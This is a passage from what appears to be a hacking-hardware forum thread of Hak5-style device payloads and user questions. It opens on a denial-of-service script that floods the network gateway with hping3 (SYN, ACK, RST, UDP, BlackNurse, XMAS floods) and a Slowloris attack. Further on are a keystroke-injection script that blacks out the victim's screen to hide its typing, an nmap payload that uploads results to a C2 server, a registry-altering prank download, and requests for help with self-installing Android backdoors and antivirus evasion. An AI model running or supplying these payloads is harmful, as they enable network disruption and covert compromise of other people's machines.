ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done while ! wget $TEST_URL -qO /dev/null; do LED W SOLID; sleep .2; LED M SOLID; sleep .8; done GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}') # Detect Gateway IP, if none exit if [ -z $GATEWAY_IP ]; then i=0 for i in {1..15}; do if [ "$i" -le "15" ]; then LED R SOLID; sleep .2; LED OFF;sleep .8; else LED R SOLID; exit 0; fi done fi if [ "$C2_CONNECTION" == "YES" ]; then LED C VERYFAST; C2CONNECT; while ! pgrep cc-client; do LED C FAST;sleep 1; done LED C SOLID; sleep .5; fi } net_connect; # Prepare the Flashy Colors! function led_attack() { LED G SOLID; sleep .2; LED Y SOLID; sleep .8; } function led_attack_dur() { for (( i=1; i<=$DURATION; i++ )); do LED G SOLID; sleep .2; LED Y SOLID; sleep .8; done } # Arm the platoon! function attack() { if [ $ATTACK = "SYN" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "ACK" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "RST" ]; then led_attack; hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "UDP" ]; then led_attack; hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "BLACKNURSE" ]; then led_attack; hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP & HPING_PID=$! led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "XMAS" ]; then led_attack; hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP & HPING_PID=$! 
led_attack_dur; kill $HPING_PID; fi if [ $ATTACK = "SLOWLORIS" ]; then led_attack; if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then PORT="80" fi INTERVAL=$((RANDOM % 11 + 5)) i=1 while [ "$i" -le "$HTTP_CONNECTIONS" ]; do # Use Netcat to create a keep-alive connection to the Gateway IP. echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & led_attack; i=$((i + 1)); done fi LED FINISH } # Simple fix for changing arguments to CAPS arg1=$1 ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' ) # Start the Attack! CHHHAAARRRGGGEEE!! if [ "$ARG_FIX" == "ACK" ]; then ATTACK="ACK" attack; elif [ "$ARG_FIX" == "SYN" ]; then ATTACK="SYN" attack; elif [ "$ARG_FIX" == "RST" ]; then ATTACK="RST" attack; elif [ "$ARG_FIX" == "UDP" ]; then ATTACK="UDP" attack; elif [ "$ARG_FIX" == "BLACKNURSE" ]; then ATTACK="BLACKNURSE" attack; elif [ "$ARG_FIX" == "XMAS" ]; then ATTACK="XMAS" attack; elif [ "$ARG_FIX" == "SLOWLORIS" ]; then ATTACK="SLOWLORIS" attack; elif [ -z $1 ]; then # Run ATTACK Variable from beginning of Script. attack; else printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n" exit 1 fi Changelog: 1.2 - - Adds BLACKNURSE/XMAS Attacks to the payload. 1.1 - - Adds UDP/RST/Slowloris Attacks to the payload. 1.0 - Initial Release. Source Code URL: Coming Soon..
  12. Hey guys, newbie here. I was wondering if there is a way / payload that, if I save a backdoor.apk in the bash, it auto installs in an Android phone? I'm making an Android apk backdoor (rat) and I'm trying to find a way to make it auto install and run with the bash without internet? If not, is there a way with USB Rubber Ducky? Thanks in advance. Sorry for my English :/
  13. I have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system, and if it does not work, what would be the changes needed for it to work. Also, I have tried to use the same payload for jpgs and photos but it does not seem to work. Is there a way for that to succeed, or is it not possible? I would really appreciate it since that is the task I have been given. Thanks
  15. Hi, just wondering if anyone could give me some guidance. I work in the security team at a company, and I want to roll out a SIEM agent to developers' laptops. I need to install this agent as quickly as possible to Linux/Mac boxes whilst they are locked or unlocked (devs don't want to do it themselves and are pretty reluctant on handing over their laptops). The agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs' laptops, put the USB in... and job done.... So my question is: if I run the install via a payload, will it install on the bashbunny OS or the laptop I've plugged it into? Or will I have to copy it to the remote OS and use a series of key presses to run it? Any advice would be great. Thanks
  16. One of the problems I had with the ducky is that when typing a script on a target's pc it's really hard if there is a person in front of it. Instead of trying to create the command screen as small as possible so the targets won't see the screen, I've made it so big that they will think the monitor crashed or the cable fell out. The only thing you see now is a black screen and black text so the targets won't see any strings the ducky types. It also doesn't matter if the user clicks somewhere on the screen with the mouse, because the whole screen is the command line. Here is the payload:

    REM Make Black Screen
    DELAY 1000
    GUI r
    DELAY 100
    STRING cmd
    CTRL-SHIFT ENTER
    DELAY 100
    ALT y
    DELAY 100
    STRING mode con: cols=30 lines=1
    ALT SPACE
    UP
    ENTER
    DELAY 100
    TAB
    SPACE
    SHIFT TAB
    SHIFT TAB
    STRING 5
    SHIFT TAB
    RIGHT
    TAB
    UP
    TAB
    TAB
    TAB
    SHIFT TAB
    STRING 0
    TAB
    STRING 0
    TAB
    STRING 0
    TAB
    TAB
    TAB
    TAB
    TAB
    DOWN
    DOWN
    DOWN
    TAB
    TAB
    TAB
    SHIFT TAB
    STRING 0
    TAB
    STRING 0
    TAB
    STRING 0
    TAB
    TAB
    ENTER
    ALT ENTER
    REM Black Screen made!
    REM ***Disable keyboard & mice ***
    REM ***PAYLOAD****

    One problem I had was to disable the target's keyboard (and mouse) so the target can't screw up the script/program the ducky is writing. It is a possibility that the target will freak out and push a lot of keys when they see a black screen. If anyone knows a solution to this problem, please notify me.
  17. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server.

    #!/bin/bash
    #
    # Title:         Custom Nmap Payload for Shark Jack
    # Author:        Flatlinebb
    # Version:       1.02
    #
    # Scans target subnet with Nmap using specified options. Saves each scan result
    # to loot storage folder. Uploads loot to your C2 server
    #
    # Red ...........Setup
    # Amber..........Scanning
    # Green..........Finished
    #
    # See nmap --help for options. Default "-sP" ping scans the address space for
    # fast host discovery.

    NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open"
    LOOT_DIR=/root/loot/nmap
    SCAN_DIR=/etc/shark/nmap

    function finish() {
        LED CLEANUP
        # Kill Nmap
        echo $1
        wait $1
        kill $1 &> /dev/null
        # Exfiltrate all loot files
        FILES="$LOOT_DIR/*.*"
        for f in $FILES; do C2EXFIL STRING $f $SUBNET; done
        # Sync filesystem
        echo $SCAN_M > $SCAN_FILE
        sync
        sleep 1
        LED FINISH
        sleep 1
        # Halt system
        halt
    }

    function setup() {
        LED SETUP
        # Create loot directory
        mkdir -p $LOOT_DIR &> /dev/null
        # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
        NETMODE DHCP_CLIENT
        # Wait for an IP address to be obtained
        while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
        # Create tmp scan directory
        mkdir -p $SCAN_DIR &> /dev/null
        # Create tmp scan file if it doesn't exist
        SCAN_FILE=$SCAN_DIR/scan-count
        if [ ! -f $SCAN_FILE ]; then
            touch $SCAN_FILE && echo 0 > $SCAN_FILE
        fi
        # Find IP address and subnet
        while [ -z "$SUBNET" ]; do
            sleep 1 && find_subnet
        done
    }

    function find_subnet() {
        SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
    }

    function run() {
        # Run setup
        setup
        SCAN_N=$(cat $SCAN_FILE)
        SCAN_M=$(( $SCAN_N + 1 ))
        LED ATTACK
        # Connect to Cloud C2
        C2CONNECT
        # Wait until Cloud C2 connection is established
        while ! pgrep cc-client; do sleep 1; done
        # Start scan (braces stop the shell reading the counter as the unset variable SCAN_M_)
        nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_${SCAN_M}_$(date +"%Y-%m-%d_%H%M%S") &>/dev/null &
        tpid=$!
        sleep 1
        finish $tpid
    }

    # Run payload
    run &

    Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  18. Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvements or changes.
  19. HoldEmUp Private Encryption Locker

    By REDD (aka Ar1k88)
    Fork from: https://github.com/private-locker/Private-Encrypted-Locker
    GitHub URL: https://github.com/private-locker/bashbunny-payloads/tree/master/payloads/library/general/HoldEmUp (Waiting on Official Hak5 Merge)

    This Script was previously released on here, then taken down. I had decided to release it on here again since we have also released the Source on our Community GitHub.

    Features:
    Use 256 AES Encryption to encrypt and secure files with a Uniquely Generated AES Key.
    Edit "settings.db" to change the file format of encrypted files.
    No need for 3rd Party Applications to hide documents.

    "How this was made? I saw how WannaCry and other Ransomware would "Hold You Hostage". So I decided to sit down, make a PoC (Proof of Concept) that quickly turned into a Security Tool that could be used to lock and unlock your own files. So I held onto the files, even released them for Hak5 as a Demo on the BashBunny, but quickly realized it had "Ransomware" qualities. I quickly removed it. But as times come to pass; Security is getting better. There's other Programmers besides myself that could benefit from this project. Prevent the next wave of "Ransomware". -REDD "

    DO NOT LOSE YOUR LOCKER KEYS! NO KEY = NO DECRYPTING. YOU HAVE BEEN WARNED!
  20. Hi dear friends. I watched this video, but I don't know which payload he was using in it. So, what do you think about it? Which payload must it be?
  21. Shanegal

    shane

    Hey guys, so I had some trouble with the screaming payload of doom payload, so I've adapted the wallpaper changer payload to do basically the same thing, but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? Can anyone help me with this please? Here is the script I've made, and I've attached the full payload at the bottom.

    LED SETUP
    ATTACKMODE HID RNDIS_ETHERNET
    GET HOST_IP
    GET SWITCH_POSITION
    udisk mount
    cd /root/udisk/payloads/$SWITCH_POSITION
    python -m SimpleHTTPServer 80 &
    LED ATTACK
    Q GUI r
    Q DELAY 500
    Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
    Q ENTER
    LED G SUCCESS

    s.wav screamer payload.txt
  22. In the spirit of April Fools, I ported the original UnifiedRickRoll to Windows, so you can easily switch between Apple and Windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  23. Hello, having received my new toy recently (bashbunny), I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested :) Affectionately, jcardonne
  24. I'm working with Kali Linux. I started getting into working with Metasploit, Payloads ... But here's the problem: I am not finding a way to create a Payload that does not get detected by an Antivirus. Please Help 😄